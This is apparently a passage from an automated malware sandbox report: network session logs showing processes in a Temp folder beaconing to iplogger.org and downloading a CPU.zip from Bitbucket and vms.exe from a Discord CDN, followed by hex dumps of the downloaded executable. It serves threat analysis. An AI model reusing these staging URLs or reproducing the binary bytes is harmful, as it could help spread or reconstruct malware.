06 03 55 1d 13 01 01 ff
                                                                                                                                                                                Data Ascii: .K`FRGpld,=+y;wIjb/^h'8>&Ys&[`I(i;(aW7tt:r/.=3+S:sA :O.2`Whh8&`uw I@H1a^wdz_blTinqviB0@0U0U


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                4192.168.2.54978388.99.66.31443C:\Users\user\AppData\Local\Temp\slhost.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                2021-11-11 11:26:31 UTC7285OUTGET /1fEwd7 HTTP/1.1
                                                                                                                                                                                MySpecialHeder: whatever
                                                                                                                                                                                User-Agent: Run
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Host: iplogger.org
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                2021-11-11 11:26:31 UTC7285INHTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                Date: Thu, 11 Nov 2021 11:26:31 GMT
                                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Set-Cookie: PHPSESSID=21ssqh8htnmues7kvn5vl7mv53; path=/; HttpOnly
                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                Set-Cookie: clhf03028ja=102.129.143.91; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=242418200; path=/
                                                                                                                                                                                Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                Answers:
                                                                                                                                                                                whoami: 25ed0554a433f7297ab5083bd5a6f93ea5b659070b6cc52ec1287153e68c8cc1
                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                2021-11-11 11:26:31 UTC7286INData Raw: 37 34 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 00 0a 49 44 41 54 08 99 63 60 00 00 00 02 00 01 f4 71 64 a6 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                Data Ascii: 74PNGIHDR%VPLTEz=tRNS@fpHYs+IDATc`qdIENDB`0


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                5192.168.2.549785104.192.141.1443C:\Users\user\AppData\Local\Temp\slhost.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                2021-11-11 11:26:36 UTC7286OUTGET /tilttilttilt/test1/downloads/CPU.zip HTTP/1.1
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                UA-CPU: AMD64
                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                Host: bitbucket.org
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                2021-11-11 11:26:36 UTC7287INHTTP/1.1 302 Found
                                                                                                                                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://d301sr5gafysq2.cloudfront.net; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com https://d301sr5gafysq2.cloudfront.net; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com analytics.atlassian.com as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net sentry.io bqlf8qjztdtr.statuspage.io https://d301sr5gafysq2.cloudfront.net; object-src about:; base-uri 'self'
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                X-Usage-Quota-Remaining: 999214.644
                                                                                                                                                                                Vary: Accept-Language, Origin
                                                                                                                                                                                X-Usage-Request-Cost: 798.77
                                                                                                                                                                                Cache-Control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                X-B3-TraceId: b743b392f1d5d33c
                                                                                                                                                                                X-Usage-Output-Ops: 0
                                                                                                                                                                                X-Dc-Location: Micros
                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                Date: Thu, 11 Nov 2021 11:26:36 GMT
                                                                                                                                                                                X-Usage-User-Time: 0.023963
                                                                                                                                                                                X-Usage-System-Time: 0.000000
                                                                                                                                                                                Location: https://bbuseruploads.s3.amazonaws.com/e8466680-8c82-495b-9e3c-2c79f82869ce/downloads/7737de24-30d9-4daf-b72b-bce98dc0f6f9/CPU.zip?Signature=3Tzq39O6DbHYG0DRC9lAn6yjoV4%3D&Expires=1636631244&AWSAccessKeyId=AKIA6KOSE3BNJRRFUUX6&versionId=rNhERZ1bRKwlh0QCY62w5KsnWg9_i2WQ&response-content-disposition=attachment%3B%20filename%3D%22CPU.zip%22
                                                                                                                                                                                X-Served-By: b50654bc14aa
                                                                                                                                                                                Expires: Thu, 11 Nov 2021 11:26:36 GMT
                                                                                                                                                                                Content-Language: en
                                                                                                                                                                                X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                                                                                                                X-Static-Version: a4fadf181312
                                                                                                                                                                                X-Render-Time: 0.0468828678131
                                                                                                                                                                                Connection: close
                                                                                                                                                                                X-Usage-Input-Ops: 0
                                                                                                                                                                                X-Request-Count: 2958
                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                X-Version: a4fadf181312
                                                                                                                                                                                X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache"
                                                                                                                                                                                Content-Length: 0


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                6192.168.2.54978652.216.1.8443C:\Users\user\AppData\Local\Temp\slhost.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                2021-11-11 11:26:37 UTC7289OUTGET /e8466680-8c82-495b-9e3c-2c79f82869ce/downloads/7737de24-30d9-4daf-b72b-bce98dc0f6f9/CPU.zip?Signature=3Tzq39O6DbHYG0DRC9lAn6yjoV4%3D&Expires=1636631244&AWSAccessKeyId=AKIA6KOSE3BNJRRFUUX6&versionId=rNhERZ1bRKwlh0QCY62w5KsnWg9_i2WQ&response-content-disposition=attachment%3B%20filename%3D%22CPU.zip%22 HTTP/1.1
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                UA-CPU: AMD64
                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Host: bbuseruploads.s3.amazonaws.com
                                                                                                                                                                                2021-11-11 11:26:37 UTC7289INHTTP/1.1 200 OK
                                                                                                                                                                                x-amz-id-2: 1rx1glMjIGSZqfNnw5o9hUpHLz85x7Webg/HPlHJyYQOPGpo0CCMX/wKUIQCbxduYsO/sVGtS6o=
                                                                                                                                                                                x-amz-request-id: WK1XAJRW4NS460VF
                                                                                                                                                                                Date: Thu, 11 Nov 2021 11:26:38 GMT
                                                                                                                                                                                Last-Modified: Fri, 08 Oct 2021 16:00:45 GMT
                                                                                                                                                                                ETag: "fd4914c5289f13c9639481a2eebbd311"
                                                                                                                                                                                x-amz-version-id: rNhERZ1bRKwlh0QCY62w5KsnWg9_i2WQ
                                                                                                                                                                                Content-Disposition: attachment; filename="CPU.zip"
                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                Content-Type: application/x-zip-compressed
                                                                                                                                                                                Content-Length: 216
                                                                                                                                                                                Server: AmazonS3
                                                                                                                                                                                Connection: close
                                                                                                                                                                                2021-11-11 11:26:37 UTC7290INData Raw: 50 4b 03 04 0a 00 09 00 63 00 5b 08 24 53 00 00 00 00 1c 00 00 00 00 00 00 00 08 00 0b 00 33 32 34 35 2e 74 78 74 01 99 07 00 02 00 41 45 03 00 00 98 a6 58 38 0b 7b 6d 7a 04 84 47 6f da ad 3c 21 00 e7 5d 48 c8 9c 3b 66 ba 09 db 90 50 4b 07 08 00 00 00 00 1c 00 00 00 00 00 00 00 50 4b 01 02 1f 00 0a 00 09 00 63 00 5b 08 24 53 00 00 00 00 1c 00 00 00 00 00 00 00 08 00 2f 00 00 00 00 00 00 00 20 00 00 00 00 00 00 00 33 32 34 35 2e 74 78 74 0a 00 20 00 00 00 00 00 01 00 18 00 38 8a 5e 72 0f a1 d7 01 38 8a 5e 72 0f a1 d7 01 38 8a 5e 72 0f a1 d7 01 01 99 07 00 02 00 41 45 03 00 00 50 4b 05 06 00 00 00 00 01 00 01 00 65 00 00 00 5d 00 00 00 00 00
                                                                                                                                                                                Data Ascii: PKc[$S3245.txtAEX8{mzGo<!]H;fPKPKc[$S/ 3245.txt 8^r8^r8^rAEPKe]


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                7192.168.2.549794162.159.135.233443C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                2021-11-11 11:26:50 UTC7290OUTGET /attachments/878034206570209333/907992537824907284/vms.exe HTTP/1.1
                                                                                                                                                                                Host: cdn.discordapp.com
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                2021-11-11 11:26:50 UTC7291INHTTP/1.1 200 OK
                                                                                                                                                                                Date: Thu, 11 Nov 2021 11:26:50 GMT
                                                                                                                                                                                Content-Type: application/x-msdos-program
                                                                                                                                                                                Content-Length: 2588967
                                                                                                                                                                                Connection: close
                                                                                                                                                                                CF-Ray: 6ac72afa8f9a6919-FRA
                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                Age: 77276
                                                                                                                                                                                Cache-Control: public, max-age=31536000
                                                                                                                                                                                Content-Disposition: attachment;%20filename=vms.exe
                                                                                                                                                                                ETag: "34cca2013eb9b2941a65971919bf356d"
                                                                                                                                                                                Expires: Fri, 11 Nov 2022 11:26:50 GMT
                                                                                                                                                                                Last-Modified: Wed, 10 Nov 2021 13:58:10 GMT
                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                                                                Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                x-goog-generation: 1636552690862931
                                                                                                                                                                                x-goog-hash: crc32c=FSDjAw==
                                                                                                                                                                                x-goog-hash: md5=NMyiAT65spQaZZcZGb81bQ==
                                                                                                                                                                                x-goog-metageneration: 1
                                                                                                                                                                                x-goog-storage-class: STANDARD
                                                                                                                                                                                x-goog-stored-content-encoding: identity
                                                                                                                                                                                x-goog-stored-content-length: 2588967
                                                                                                                                                                                X-GUploader-UploadID: ADPycduirRXiazQPcriFq69oGGYwGT_qv7fqX2JQlM4WmtbyjnOhreXZaM0kVvrA5hftX2SwpeNJ7_dll02rT70iFNM
                                                                                                                                                                                X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                                                                                                                2021-11-11 11:26:50 UTC7292INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 34 73 42 31 69 59 37 6a 65 69 52 4c 36 65 25 32 46 51 78 70 65 61 51 6f 37 52 77 37 4e 4d 4e 52 44 4c 36 4d 39 47 25 32 46 36 5a 68 37 79 41 44 64 6c 55 38 4e 56 39 6f 36 44 54 63 5a 53 66 74 70 6d 64 34 50 64 55 6d 54 4b 4b 76 25 32 46 33 63 63 75 39 6e 73 48 25 32 42 75 72 45 4f 54 36 6f 35 46 78 76 68 4f 5a 73 25 32 42 7a 52 6f 76 25 32 42 4b 66 4d 30 48 36 64 68 77 74 7a 66 6e 73 30 46 6e 62 6f 70 50 49 74 41 66 75 76 33 4f 66 77 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78
                                                                                                                                                                                Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4sB1iY7jeiRL6e%2FQxpeaQo7Rw7NMNRDL6M9G%2F6Zh7yADdlU8NV9o6DTcZSftpmd4PdUmTKKv%2F3ccu9nsH%2BurEOT6o5FxvhOZs%2BzRov%2BKfM0H6dhwtzfns0FnbopPItAfuv3Ofw%3D%3D"}],"group":"cf-nel","max
                                                                                                                                                                                2021-11-11 11:26:50 UTC7292INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e1 c3 c9 b8 a5 a2 a7 eb a5 a2 a7 eb a5 a2 a7 eb fe ca a4 ea af a2 a7 eb fe ca a2 ea 3a a2 a7 eb fe ca a3 ea b7 a2 a7 eb 70 cf a3 ea b7 a2 a7 eb 70 cf a4 ea b7 a2 a7 eb 70 cf a2 ea 8c a2 a7 eb fe ca a6 ea aa a2 a7 eb a5 a2 a6 eb 3a a2 a7 eb 3e cc ae ea a4 a2 a7 eb 3e cc 58 eb a4 a2 a7 eb 3e cc a5 ea a4 a2 a7 eb 52 69 63 68 a5 a2 a7 eb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$:ppp:>>X>Rich
                                                                                                                                                                                2021-11-11 11:26:50 UTC7293INData Raw: 48 c0 fc 67 42 14 25 16 e6 b4 be b7 bd 70 d4 d1 92 7a 84 ab 94 88 1c d3 48 dd bd 32 38 7f 6a 16 13 61 f3 4f cd 6f 05 32 f9 fd 3c 92 44 3a a1 70 e7 a8 f8 81 20 08 f0 ad c8 72 2a 7c 50 d0 64 b2 e8 10 09 79 3d 14 a3 51 3a d2 4a 30 06 a8 30 82 f8 8c 3d 65 10 10 49 b0 22 52 0c 9a d0 80 3c 7b 8f 7d bc 11 85 d2 0a 33 f5 a8 a8 41 f8 c0 be 82 9d 39 d6 b1 39 82 aa 7b f8 6b dc 65 92 a0 04 7e bd 70 a5 d1 f8 7a 39 78 88 ac a4 81 40 08 30 b4 10 c4 3d 28 b2 7c a4 c1 20 70 fc ad f7 fd 48 b0 28 6f 8a 98 08 84 44 52 f0 28 05 b0 1d 6f 84 7e 62 70 32 ee f8 70 be fa 3d 87 5d bf fa fa 56 92 4a 08 9d 29 e9 d2 af 52 88 80 ea 1f 79 80 9c 74 8f 7d bc 11 85 d1 0a 3a 81 d2 24 7b ea 1d 8b 50 48 c6 a8 67 dc f0 48 50 50 80 02 45 1e 14 04 88 d0 e8 fe 79 0b 00 30 06 f8 c5 d4 27 b3 32 35
                                                                                                                                                                                Data Ascii: HgB%pzH28jaOo2<D:p r*|Pdy=Q:J00=eI"R<{}3A99{ke~pz9x@0=(| pH(oDR(o~bp2p=]VJ)Ryt}:${PHgHPPEy0'25
                                                                                                                                                                                2021-11-11 11:26:50 UTC7295INData Raw: c0 13 2d b4 2c 09 c3 db 90 c7 fa 3b 1c 9d 24 b7 33 5c 36 dc 9c 25 4d 04 27 c3 cd f1 c6 a8 ac fb 45 ee fd f3 b0 d3 72 4b 1c 3e af 98 bf 6b 69 4b a3 81 b9 0e 14 c3 72 ff fd 68 0b 1a c0 be 29 06 5b 26 e1 5b 8a 16 e4 2a d3 cc 52 91 26 57 65 d8 09 8d e8 a0 91 84 cd 3a 62 4e 16 8d 4d 55 e8 b8 41 15 6a 5a d4 01 61 a4 bf bc 29 4b 4c fb 69 32 c2 fb b1 fd 01 49 d9 af 67 31 82 f9 ff 44 74 91 bb 78 92 99 0b ff 6f 26 22 c7 5b 89 56 c1 53 0a a3 79 59 97 3f 6f b2 05 2c 65 0b 86 ea 7d d2 5d 81 09 02 f7 87 6c ef 96 a4 c3 b2 33 2c 7c b7 a8 0a c9 b8 19 08 bf 6a 89 4f c6 93 ba 90 b3 31 e2 40 f1 64 ae 9d 76 63 ce a2 fc c6 a8 70 02 2d 51 d1 0b 31 8c bf c5 bb f4 be ac 70 de 0a cd b2 84 e2 6d 59 e4 4a 16 43 0a 49 5d 58 b8 74 5f 31 28 28 29 ae b5 12 11 36 f3 79 58 c1 0e a8 d5 25
                                                                                                                                                                                Data Ascii: -,;$3\6%M'ErK>kiKrh)[&[*R&We:bNMUAjZa)KLi2Ig1Dtxo&"[VSyY?o,e}]l3,|jO1@dvcp-Q1pmYJCI]Xt_1(()6yX%
                                                                                                                                                                                2021-11-11 11:26:50 UTC7296INData Raw: 87 86 43 5c 2e 8b 94 9c 10 92 ec 7f ac 9e 0b 10 5d 63 c4 61 9c 41 78 1c f9 79 4a 8a 90 4c 8b c5 4a cd ec 34 f6 1a 2b 03 84 bb a8 72 53 30 25 c8 3b c2 62 b0 d6 91 07 a3 d5 3b 14 48 fa 9d d7 74 0c bc 58 a0 c9 49 0e 6c 41 d4 a8 c4 06 47 fb 5c 8c a0 a3 64 05 46 01 76 63 4f fc f7 7d 7a ca f7 06 52 01 48 58 30 97 45 ae b5 0a 60 b5 5d 00 70 46 b2 f0 58 4b 5b 17 c3 d2 dd 57 d2 e8 6f 50 5f 00 8a e0 13 d4 c1 1e a9 d5 9f b5 1f 07 4e 0f 83 c5 e1 0b 09 3a ea 53 55 06 06 36 ae 75 0a 51 28 8f 06 3d 72 a2 4c 30 40 fd e1 3d 51 21 75 ea e0 bb af 38 54 ed 77 50 cf 1c 5c 82 b7 cf cf 40 7e 72 11 29 b0 15 30 05 06 05 c6 59 61 53 c1 ea 83 2d f9 e2 87 49 ef 9c c0 d4 cb 2c c7 79 8c d6 70 a4 93 d8 59 5a eb 26 62 b2 ca ff cc d2 69 04 c8 11 2e 60 40 be 4f 48 69 b4 6c 30 70 f1 59 70
                                                                                                                                                                                Data Ascii: C\.]caAxyJLJ4+rS0%;b;HtXIlAG\dFvcO}zRHX0E`]pFXK[WoP_N:SU6uQ(=rL0@=Q!u8TwP\@~r)0YaS-I,ypYZ&bi.`@OHil0pYp
                                                                                                                                                                                2021-11-11 11:26:50 UTC7297INData Raw: 6e 3e cb c3 a3 18 83 84 57 87 52 ed cd 32 8f 97 fb 13 54 c4 42 c8 2b c8 3c b9 09 ec 79 20 71 5a c9 58 cd 10 38 89 68 84 64 47 48 c7 bb 13 84 7e f9 d3 c8 c5 f2 c6 c6 37 2d b1 18 76 33 98 19 1e 20 92 dd 9a 16 4d b4 54 b8 04 38 d1 70 cd 40 6d 63 07 0f 88 49 19 70 a8 29 a0 4f ab 34 0e e4 6e 2b 3c 09 4b 38 4a b1 fa 28 d2 2a d2 f1 ee 0f 84 14 cf 5d 31 33 de 37 d2 b1 f8 01 7c 79 55 3d be 8e 0c 40 b7 2c cf bf 83 b8 ce 6a 44 f3 c7 ed bf a5 93 c8 c3 28 48 fb 58 b8 f4 f0 3b 41 71 dc 4b 5c 45 4c 7d b8 ca 30 9b 2b 86 d5 45 22 47 01 fb 07 73 c5 68 0b 93 49 aa 91 f9 d6 b4 d9 87 34 07 03 53 b8 d0 3e 93 56 4e c6 c7 ca c5 fe 46 1b c3 29 78 04 a5 d5 52 9e d8 2c 80 40 55 b3 80 ef fa fd 28 38 4d f2 2f 0f 5d 7a e4 4a fb 3d 90 6f 4d de b6 b4 4c 5b 5f 1f 09 10 04 44 a3 fd f0 fa
                                                                                                                                                                                Data Ascii: n>WR2TB+<y qZX8hdGH~7-v3 MT8p@mcIp)O4n+<K8J(*]137|yU=@,jD(HX;AqK\EL}0+E"GshI4S>VNF)xR,@U(8M/]zJ=oML[_D
                                                                                                                                                                                2021-11-11 11:26:50 UTC7299INData Raw: 05 7f 43 13 de 69 7e b4 b7 2d 6e d1 5f 20 d5 a0 81 86 94 1a a6 2f ea 99 97 05 79 ea c2 37 cc 40 08 88 cf ce 2c ff 60 3a ac 34 5f a0 ad 77 d4 6e ab 62 c2 48 93 d4 d1 15 b9 9e a1 79 26 cf 31 62 c4 29 a5 2c 53 48 b1 ae 37 e8 4b 74 15 95 dc fc c7 20 5c 6f bd 12 7f bf 69 be 63 12 43 4e 7d 25 9d 00 44 72 92 88 04 ee cf a3 6d e5 64 33 d0 58 c6 cd 6d 88 07 d5 a5 b2 40 48 6f 2a c7 64 73 cf f8 8e 38 71 ae f4 1d 29 05 64 24 f8 e7 06 63 02 19 d3 c8 1a 11 6e 12 90 a7 14 66 bc 97 e3 85 26 6e dc 64 44 f2 22 af f7 0a f4 12 e2 0d d4 d6 1e 74 67 73 8a e5 52 98 a6 b6 52 db b1 16 59 9d 38 08 69 75 1a 7a 3f 9f 4d 2c 53 c5 bc b1 08 6b f9 24 46 cd 81 19 0b 42 89 df 70 48 b3 07 71 09 8d b2 b6 dc 75 8f e9 81 15 f5 88 3c 24 bd 70 2a 0a 45 8c f6 6d 34 62 d4 19 76 ec 2b 9f 4f d2 fc
                                                                                                                                                                                Data Ascii: Ci~-n_ /y7@,`:4_wnbHy&1b),SH7Kt \oicCN}%Drmd3Xm@Ho*ds8q)d$cnf&ndD"tgsRRY8iuz?M,Sk$FBpHqu<$p*Em4bv+O
                                                                                                                                                                                2021-11-11 11:26:50 UTC7300INData Raw: 22 46 05 cb 6d d4 df 97 8f 7e f1 a1 79 d8 3f 71 3f 73 af e4 48 a1 b1 86 a3 7c b2 c7 17 46 c0 c5 84 0a 25 61 3f 93 27 3e 82 78 ad e4 a2 2f b8 27 78 39 db 1f 8c ab 23 a9 c4 2d 4f e4 3a 30 22 d2 63 fc a0 72 e1 19 7a bb 96 b9 89 3e 63 19 c9 01 cc bf fd 44 93 44 b0 6f e4 73 c2 f8 a0 c2 4b 39 f5 a8 a4 7a c6 5d f3 51 30 b7 26 93 bd d2 0a 36 e6 4f 02 97 d4 38 f7 a9 d5 a4 8f 37 92 6c 12 79 17 16 73 55 59 4c 0b d3 f4 ad 77 b7 17 16 c2 94 13 5d 03 67 f4 43 2a 78 90 a4 d7 16 24 f7 c6 7a cd 8b 7b f8 67 4a 46 35 7d 64 d0 fa 0b b9 b2 0f c8 80 1c 2c 65 14 92 f1 51 96 2a 6a 1b 4b d4 08 59 8e 9e f5 db d4 b9 56 91 8b 63 f0 21 33 8a 81 51 c3 53 13 2b 9b ea 09 5b f4 2d 90 57 de 88 75 9a a6 87 d0 d6 81 86 2d 84 23 9c d0 4c c2 dd 38 e0 92 f0 96 ba 27 bd e0 b6 2c 75 90 39 24 2d
                                                                                                                                                                                Data Ascii: "Fm~y?q?sH|F%a?'>x/'x9#-O:0"crz>cDDosK9z]Q0&6O87lysUYLw]gC*x$z{gJF5}d,eQ*jKYVc!3QS+[-Wu-#L8',u9$-
                                                                                                                                                                                2021-11-11 11:26:50 UTC7301INData Raw: a5 3d 0b 08 c2 ce 17 92 ba 82 64 41 b0 95 ca 14 85 82 44 7a 55 93 3a 2f c0 81 d3 2c 76 da 73 8a 70 64 6c f9 a8 9f 64 75 71 e8 e7 8f 3c 56 64 1b 59 e0 46 14 67 d1 91 75 7c da 4a d3 c5 7d a7 88 73 ac 8d 80 9b 11 98 8e 5b 75 f8 0f 59 d5 d2 7c 4b 2e 52 b3 ea 4c 8e 46 d5 2d 04 f1 ee 37 79 d6 02 e5 6a d3 a7 81 f8 32 21 52 b1 6f 5c 6b 62 15 47 81 5d 34 c6 2e 4b a8 34 79 02 95 0e c2 aa d6 d8 ef 17 09 7f ca 81 6c 5c 86 73 01 10 20 e4 16 02 15 fd 2a fd d2 03 d1 bc 63 84 d2 ad 52 d4 80 9f f9 f2 d4 a9 4f e8 7f cb 79 f6 0a 19 92 40 d8 b8 dc 87 fb 5c 91 a9 45 4a e5 dc 4a 17 b8 35 22 c4 6d 38 28 df 2b 18 8d 48 15 25 d6 a3 18 e8 2c d9 58 50 0c d3 f9 02 0e ff 23 12 c2 8e 49 d7 c9 f3 aa f6 c0 69 de 47 90 9d 2b 2e b5 f5 38 c0 5c f8 52 1e 8f 3b fb 67 a4 41 18 1d 2b 5d b5 1e
                                                                                                                                                                                Data Ascii: =dADzU:/,vspdlduq<VdYFgu|J}s[uY|K.RLF-7yj2!Ro\kbG]4.K4yl\s *cROy@\EJJ5"m8(+H%,XP#IiG+.8\R;gA+]
                                                                                                                                                                                2021-11-11 11:26:50 UTC7303INData Raw: 6d de f8 8e c3 d0 d0 d0 cb 2e 73 ee 6c 37 e8 ec 53 4c 02 3c 7a d8 5a b7 f8 d5 63 88 d7 2b 5e 4c 89 f2 9b 01 1e 61 48 47 4c 73 18 ce ec d5 af f9 34 3a b6 9f 8d e0 18 2b f7 4c e5 16 68 e2 4a 5c 2e 9a 14 7f 79 38 28 f8 ea a3 25 d1 eb e7 83 78 83 d4 94 01 e4 90 20 a4 9a 87 7d 41 2a 2d 23 1d 09 e7 38 de cb 9c 81 5c c5 c4 00 be 15 8a 4e 37 14 ab a3 30 94 f3 d6 8c 20 67 60 4b fe 86 f8 73 59 13 78 3f d1 92 88 bc e5 48 94 b3 48 b2 75 c9 e8 42 4b 5a c3 0c 44 a6 b7 74 c3 bc 79 74 18 91 12 a8 91 97 b8 11 36 25 ee 24 94 b9 4c c4 24 8e f6 a9 3c 3b 3f f4 53 aa 3d b2 a7 98 00 bb c1 48 8e ac 58 41 81 13 70 3b c7 11 f3 34 f3 1b 20 41 50 6b 9d b0 b6 b4 82 69 35 c2 9e a5 72 44 c6 48 19 67 9c d0 be b0 46 75 e6 fa c5 44 51 b4 9a 02 e0 80 10 cc 00 87 06 48 39 aa 2d 49 c0 b4 0c
                                                                                                                                                                                Data Ascii: m.sl7SL<zZc+^LaHGLs4:+LhJ\.y8(%x }A*-#8\N70 g`KsYx?HHuBKZDtyt6%$L$<;?S=HXAp;4 APki5rDHgFuDQH9-I
                                                                                                                                                                                2021-11-11 11:26:50 UTC7304INData Raw: 6d 4e 92 11 c0 14 b6 cc 84 7d 32 01 2f 90 fb ed 21 3b a4 59 2f 45 d8 c1 61 73 48 e7 bf ff 9c dd b1 09 15 35 bc 02 b1 e3 53 3c 75 4d 5c 30 3a b4 f9 b9 dc 15 13 13 6a 95 c0 0e d2 b7 c8 25 bf a3 76 9e 48 1a 0c 4b 20 90 f7 14 a3 a1 14 4c 6d 25 13 32 11 63 68 8c 38 f9 64 d3 54 9d ce e9 01 47 ef 40 27 cb a8 8e 48 4a f8 ca 01 0a 4f 6a 18 f9 4a 12 30 0c 8b cf 94 15 a8 36 f4 a6 9e 08 d1 bc 77 32 4a 36 8b 0e 5a b4 de a2 a3 ed 1f fc fc ab 86 13 d5 f1 e9 04 d6 09 90 14 7f 0c 46 ac 62 c1 77 c7 b1 77 40 aa d6 ee 1c f5 af 80 43 10 42 0c 04 d1 3b a2 6a 95 54 b6 97 0f 41 5f 73 a8 f5 f4 19 ff 4c 51 34 20 2c 70 86 6d 29 f3 25 f8 bc 41 0e 07 7e 97 f6 14 aa 23 5c 37 a2 ab 7c 2c 02 38 fd 48 2d fa 34 a2 24 36 b9 6f 37 d5 ef c3 db 7d e2 e5 1e fa 0f 52 5f f2 02 54 15 50 3f 49 cb
                                                                                                                                                                                Data Ascii: mN}2/!;Y/EasH5S<uM\0:j%vHK Lm%2ch8dTG@'HJOjJ06w2J6ZFbww@CB;jTA_sLQ4 ,pm)%A~#\7|,8H-4$6o7}R_TP?I
